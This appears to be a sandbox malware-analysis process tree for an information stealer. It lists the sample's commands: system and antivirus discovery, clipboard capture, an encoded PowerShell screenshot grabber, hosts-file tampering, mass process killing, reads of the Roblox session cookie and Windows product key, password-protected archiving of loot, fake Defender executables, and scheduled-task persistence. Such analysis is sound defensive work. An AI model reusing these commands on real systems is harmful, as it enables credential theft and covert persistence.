C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:3860 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:5524
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:4164 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"6⤵PID:2792
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName7⤵PID:6424
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"6⤵
- Clipboard Data
PID:5900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard7⤵
- Clipboard Data
PID:6608 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:5972
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:6492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:2112
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:6568
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4016 -
C:\Windows\system32\netsh.exenetsh wlan show profile7⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6684 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"6⤵PID:4200
-
C:\Windows\system32\systeminfo.exesysteminfo7⤵
- Gathers system information
PID:6676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"6⤵PID:5128
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath7⤵PID:6648
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="6⤵PID:5768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=7⤵PID:6668
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cxq1tcps\cxq1tcps.cmdline"8⤵PID:6280
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF7B9.tmp" "c:\Users\Admin\AppData\Local\Temp\cxq1tcps\CSC7E012C82B4FD40A490D89D6C2ECF613.TMP"9⤵PID:6164
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:6812
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:7120
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"6⤵PID:6936
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts7⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:7148 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:4944
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:6232
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"6⤵PID:5456
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts7⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:3664
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:6200
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:5860
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:6216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:6088
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:6300
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:1948
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:5588
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"6⤵PID:6260
-
C:\Windows\system32\getmac.exegetmac7⤵PID:6432
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1068"6⤵PID:6844
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 10687⤵
- Kills process with taskkill
PID:6520 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2308"6⤵PID:6248
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 23087⤵
- Kills process with taskkill
PID:5192 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1056"6⤵PID:6476
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 10567⤵
- Kills process with taskkill
PID:6748 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1008"6⤵PID:6616
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 10087⤵
- Kills process with taskkill
PID:6592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1068"6⤵PID:6408
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 10687⤵
- Kills process with taskkill
PID:5848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4060"6⤵PID:6184
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5968
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40607⤵
- Kills process with taskkill
PID:5376 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4892"6⤵PID:5720
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48927⤵
- Kills process with taskkill
PID:5828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2308"6⤵PID:5772
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 23087⤵
- Kills process with taskkill
PID:5180 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1724"6⤵PID:5952
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17247⤵
- Kills process with taskkill
PID:6892 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1056"6⤵PID:6220
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 10567⤵
- Kills process with taskkill
PID:6544 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1700"6⤵PID:6264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:6648
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17007⤵
- Kills process with taskkill
PID:5412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1008"6⤵PID:1808
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 10087⤵
- Kills process with taskkill
PID:6848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4616"6⤵PID:6800
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 46167⤵
- Kills process with taskkill
PID:3620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4060"6⤵PID:6756
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40607⤵
- Kills process with taskkill
PID:7096 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4892"6⤵PID:6388
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48927⤵
- Kills process with taskkill
PID:804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1724"6⤵PID:3664
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17247⤵
- Kills process with taskkill
PID:6992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1700"6⤵PID:3216
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17007⤵
- Kills process with taskkill
PID:2180 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4616"6⤵PID:6412
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 46167⤵
- Kills process with taskkill
PID:5480 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"6⤵PID:2376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Command and Scripting Interpreter: PowerShell
PID:2548 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"6⤵PID:5648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵PID:1236
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48442\rar.exe a -r -hp"h3x" "C:\Users\Admin\AppData\Local\Temp\clNL3.zip" *"6⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\_MEI48442\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI48442\rar.exe a -r -hp"h3x" "C:\Users\Admin\AppData\Local\Temp\clNL3.zip" *7⤵PID:6940
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"6⤵PID:544
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption7⤵PID:4644
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"6⤵PID:4228
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory7⤵PID:4284
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵PID:4440
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵PID:7080
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"6⤵PID:3892
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER7⤵
- Command and Scripting Interpreter: PowerShell
PID:5228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"6⤵PID:6356
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Detects videocard installed
PID:1056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"6⤵PID:2444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault7⤵PID:2428
-
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreService.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreService.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3164 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\agentComponentFontNet\bxoJGLIQD6QziGsZBKG.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\agentComponentFontNet\ijkdLO.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:7036 -
C:\agentComponentFontNet\MsHyperPort.exe"C:\agentComponentFontNet\MsHyperPort.exe"7⤵
- Executes dropped EXE
PID:4708 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpCmdRun.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpCmdRun.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4480 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\chainReviewdhcp\zwrFyO.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4664 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\chainReviewdhcp\FBfKzmFJ0gnf1.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:376 -
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"7⤵
- Executes dropped EXE
PID:6456 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c attrib "+h " "+s " C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform3⤵PID:3040
-
C:\Windows\system32\attrib.exeattrib "+h " "+s " C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4200
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Public\Music\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Music\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Cookies\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Admin\Cookies\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Cookies\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7136
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\agentComponentFontNet\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6936
-
